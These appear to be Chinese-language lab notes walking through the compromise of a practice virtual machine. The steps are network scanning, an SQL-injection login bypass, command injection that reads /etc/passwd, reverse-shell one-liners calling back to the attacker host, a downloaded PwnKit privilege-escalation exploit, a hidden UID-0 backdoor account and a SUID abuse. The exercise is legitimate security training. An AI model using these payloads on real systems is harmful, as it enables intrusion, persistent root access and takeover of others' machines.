第一步：扫描存活IP地址

命令：nmap -sP 10.86.135.0/24

1. 10.86.135.26是靶机ip
2. 10.86.135.146是宿主机ip
3. 10.86.135.150是网关
4. 10.86.135.32是虚拟机Kali的ip

第二步扫描开发端口

命令：nmap -sV -T4 10.86.135.26

可以看到10.85.135.26 开发了 22端口和8080端口

第三步 尝试进行连接并运行指令

命令：nc 10.86.135.26 8080

结论：报错显示这是一个HTTP 网页服务端口

我们可以尝试进入这个页面

第四步注入指令

1.绕过登录” or 1=1–

测试查看密码，账户文件

hello;cat /etc/passwd   成功 

hello;cat /etc/shadow  未成功

3.尝试反弹登录

kali：nc -lvnp 4444

窗口注入：

1. hello;nc 10.86.135.32 4444 -e /bin/bash（失败）
2. hello;nc 10.86.135.32 4444（成功）  但无法显示指令结果，靶机无法识别-e参数
3. hello;python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.86.135.32”,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([“/bin/dash”])’（成功）
4. ;/bin/bash -c ‘bash -i >& /dev/tcp/10.86.135.32/4444 0>&1’

4.创建root用户(1)

cd /tmp

wget https://cdn.jsdelivr.net/gh/ly4k/PwnKit@main/PwnKit
chmod +x PwnKit
./PwnKit

useradd -o -u 0 -g 0 -M backdoor

echo ‘backdoor:Admin@123’ | chpasswd

id backdoor                                                                                       

5.创建root用户(2)

；find / -perm -u+s -type f -ls 2>/dev/null   查找suid文件

./update_cloudav ‘;/bin/bash’     运行 update_cloudav 程序 → 中途打断它 → 强行开一个 root shell

创建一个普通用户并放进 sudo组里

创建的456账户放进root组里